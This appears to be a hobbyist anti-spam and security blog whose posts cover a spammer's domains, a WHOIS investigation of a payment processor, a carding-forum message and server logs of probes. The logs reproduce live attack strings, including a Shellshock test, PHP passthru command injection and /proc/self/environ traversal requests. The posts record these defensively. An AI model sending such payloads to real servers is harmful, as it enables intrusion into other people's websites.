“() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;”

I wonder a little bit about these two hits in the log from a website:

Fri, 3 Oct 02:46    95.211.131.148    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;
Fri, 3 Oct 11:32    209.11.159.26    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;

Something about bash maybe?

209.11.159.26:

Quality Technology Services Santa Clara, LLC QTS-209-11-128-0-18 (NET-209-11-128-0-1) 209.11.128.0 - 209.11.191.255
IBIS Inc. QTS-209-11-159-0-24 (NET-209-11-159-0-1) 209.11.159.0 - 209.11.159.255

95.211.131.148 is LeaseWeb, which used to be a shitty place.
Still is, obviously.

Advertisements
Posted in 1. Comments Off on “() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;”

William Stanley is apparently back

If he ever went away, that is.

I’ve seen spam to several of the domains I have registered.
All to the address info@domain.tld.
I wonder if Google is happy about the from address “no-reply at gmail” being used.

Something along this in common:

From: “You Need Reviews” <No-reply[atdomain]gmail.com
Subject: Got Bad Reviews? Need good Reviews?
To: “info”<info@domain.tld>

We Post Good Reviews.
We do Reputation Repair.
We do Blog Advertising.

We can help you defend your company by posting positive Reviews, Blogs and creating Websites
to take over Search Results and control what people see about your company.

361-444-3559

http://www.ReviewShowcase. com for Paid Review Posting Service
http://www.ReviewShowcase. com for Reviews and Reputation Service

How does posting positive reviews help in your businesses Google ranking?

1. Positive reviews increase your business rank by linking important and relevant websites to your website.
2. A constant stream of positive reviews improves your online reputation.
3. Positive reviews drive traffic to your business.
4. Positive reviews restore a tarnished reputation by pushing down negative reviews and links.
5. Helps protect against competitors or anyone else from attempting to run your ranking.

361-444-3559 ReputationRewards@gmail.com

He also falsifies headers by trying to spoof yahoo.com as the sender.

Email addresses used:
myprogramskills@gmail.com
postingshowcase@gmail.com

Short info from the domain registration:

Domain Name: REVIEWSHOWCASE.COM
Registrar: MONIKER

Registrant [1426977]:
        William Laurence reliablechat@gmail.com
        2120 hwy 361
        port aransas
        TX
        78373
        US

Late april reviewshowcase.com was hosted at 207.189.109.125, ViaWest.
Now it lives at 103.11.189.31, something called VERTICAL ENTERPRISE LLP in Singapore.

As usual there is quite a lot of domains involved, a few of them (some are most likely already dead):

  • bestreviewservice.com
  • blametaker.com
  • cdrplacementgroup.com
  • crushyourcompetition.com
  • complaintcontrol.com
  • deluxereputation.com
  • findfaxnumbers.com
  • freespeechhost.com
  • postgoodreviews.com
  • postingpositivereviews.com
  • postingshowcase.com
  • programskills.com
  • referenceguy.com
  • reputationmoniker.com
  • reputationpromo.com
  • reputationtracker.info
  • supportgator.com
  • yourbestreputation.com‎
  • youneedreviews.com

And one not fitting the pattern above, but rather more along the russian bride scamming business:
safebride.com‎ – seems to be gone.

Another one is acewigsblog.com, which also seems to be gone.
But why not get into the business of wigs, he has tried a lot before, like diapers.

I wonder how he managed to get out of Spamhaus’ ROKSO list.
Or maybe more correct; Why he isn’t back on ROKSO.

Posted in spammers. Comments Off on William Stanley is apparently back

The dark past of Gateline / Onelya

Brian Krebs has written an excellent article on his blog, krebsonsecurity.com:
“Gateline.net Was Key Rogue Pharma Processor”

It’s an article in a serie about the “Pharma War” between to Russian spammers, Pavel Vrublevsky and Igor Gusev.
The focus in his latest article is, as the title says, the payment processor for both, Gateline.net and the people involved.

I’ll float on Krebs’ research, add some relatively old stuff and compare that with existing info from today about Gateline. Which will show their ugly past.
And maybe what their business is today, who knows? I don’t.

I’ll also make attempts to identify a couple of guys in his article.

But it has to be later, I am seriously hit by what I think is called “writers block”.

April 23, 2012

Building bit by bit, a little addition today.
I don’t know when or if more will come

I checked a few pieces of information based on Krebs’ article.
One little piece is relatively easy to have a look at, the information in the domain registration for gateline.net as of today:

Administrative Contact, Technical Contact:
      France, Kellee		adm@onelya.ru
      Onelya Ltd.
      21-1 Novy Arbat
      Moscow 119019
      RU
      +7 495 3630953

The domain was created 01-may-2002.
Please note a couple of details:
“France, Kellee”“ and “21-1 Novy Arbat”

My nosewings started vibrating, but I could not put my finger on exact why.
A few quick searches and I found a few small pieces of info, about 10 years old.

Now let’s compare todays info about Gateline and Onelya to what made my nose wings go crazy.
This is the registration info for a couple of other domains, ufs-online.org and paymentway.net, as it was shown in november 2002.
First ufs-online.org:

Registrant:
 GARDINER INDUSTRIES INC.
 12260 Willow Grove Road Bldg. #2
 Camden, DE 19934
 US

 Domain Name: UFS-ONLINE.ORG

 Administrative Contact:
    Kellee, France  admin@ufs-online.co.uk
    12260 Willow Grove Road Bldg. #2
    Camden, DE 19934
    US
    +1 917 523-44-79

 Technical Contact:
    Labor, Alex  a1582_l@hotmail.com
    Ministeer 48/2
    Sverdlovsk, SR 113326
    RU
    +73432 126718
    Fax: +73432 126718

And a shorter version of the registration info for paymentway.net:

Registrant:
France, Kellee (HNWKZNXJHD)
   12260 Willow Grove Road Bldg. #2
   Camden, DE 19934
   US

   Domain Name: PAYMENTWAY.NET

   Administrative Contact:
      France, Kellee  (COHLMRHLXI)		admin@paymentway.net
      
      12260 Willow Grove Road Bldg. #2
      Camden, DE  19934
      US
      123654987 123 123 1234

We again have the same name as in the info for gateline.net, “France, Kellee”.
The email address for the “technical contact” is also somewhat interesting, I may come back to that later.

So what about the domains “ufs-online.org” and “paymentway.net”?
What was they used for?
As Gateline in 2012, ufs-online.org and paymentway.net was also a part in a payment process back in 2002.

But not for spammers selling illegal drugs.
No, it was for spammers and criminals abusing little girls.

A quote from one of those sites back in 2002:

“ELITE UNDERAGE ARCHIVE” – Huge Collection.

This kind of sites were often organized with “portal” sites which again served links further to sites where pictures and/or movies of sexually abused children were sold.

Now back to “ufs-online.org” and let’s have a look at another little pesky detail about the domain:

ufs-online.org 1 SOA
server: ns1.ufs-online.org
email: aw@cardbilling.net

Note: email: aw@cardbilling.net

To be continued (when I get around to do so)

Posted in 1. Tags: . Comments Off on The dark past of Gateline / Onelya

Oh, really?

This is a bit funny:

remarks:         This is Ideal-Solution and 2x4.ru Hosting IP network
[snip]
remarks:         ***************************************
remarks:         note for spamhause company of usa:
remarks:         stop follow this subnet, nothing bad here, you can contact us if need.
remarks:         ***************************************

I wonder if “spamhause company of usa” actually is meant to be spamhaus.org.
Everybody knows that Steve Linford is floating around in a houseboat somewhere in Britain, don’t we?
Well, we are perhaps almost equal in knowledge there, the russians and myself, regarding geography and the whereabouts of Spamhaus.
But I feel reasonably sure that they are not in the US.

And I also know that the netblock 193.107.16.0/22, “Ideal Solution Ltd”, mounted by WebAlta has a history of exploits, trojan and you can name whatever bad stuff you can imagine on the net. And 2×4.ru? Not exactly angels.

At least they are better at hosting criminal activity than in geography.
Always good to feel you master something, whatever it is.

Posted in malware, bots. Tags: . Comments Off on Oh, really?

58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” during a few seconds.
This one was a bit more “intense” than usual, +1100 lines in the log and it lasted for +13 minutes.
Coming from the IP 58.63.241.209 (China), looking for weaknesses to exploit, “proc/self/environ%00”.

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines, see the attached .txt-file (.txt is now allowed?) .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.

Posted in hackers. Comments Off on 58.63.241.209 knocking on the door.

carder.cc – Phoenix raising from the ashes?

Got this one a couple of days ago.
Interesting?
I don’t know.
October is here and it is not much time left.
If anybody else is interested …

carder.cc seems to be live at 85.17.81.165, Leaseweb. No surprise there, rotten place.

Good day, dear forum member CARDER.CC

After a three-year break our forum resumes. Since you have received this message, it means you’re one of those whose account is not deleted on the forum. Let’s hope – not in vain.

All the principles of access to the forum will be seriously reconsidered. Will be introduced the hard surety and financial liability. Forum is fully enclosed and paid as Only then can we ensure that the work on it only those who really need a forum, not a place for quality kidka.

As always – welcome professionals in their field, both for the moderation of the relevant sections and to provide quality services.

This offer is valid only until October 1, 2011. If you are not logged in to the forum before that time, your account will be blocked. Sorry, but this is a security policy.

If you are satisfied with the new conditions – are waiting for you. If not – good luck in your business.

Sincerely, S-tamps

Posted in Uncategorized. Comments Off on carder.cc – Phoenix raising from the ashes?

Gootkit auto-rooter scanner – hello

First time I have seen something identify as “Gootkit auto-rooter scanner”.
As a sidenote, this is also an example of why I prefer to block afrinic.
Too much rotten stuff coming from that space.

All these came via 41.129.63.65:

 [21/Sep/2011:09:28:13 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /PHPMYADMIN/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /mysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/setup.php HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /~/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /admin/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /administrator/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /administrator/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/sysadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /bbs/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmindb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelmysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelsql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpdbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/db-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /db/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /~/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /MyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladminconfig/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /~/phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /~/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmy/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmya/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /php-my-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin1/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phppma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /p/m/a/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /program/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /qql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /roundcube/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /sl2/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /SQL/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /sql/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /typo3/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:36 -0400] "GET /websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
Posted in hackers. Comments Off on Gootkit auto-rooter scanner – hello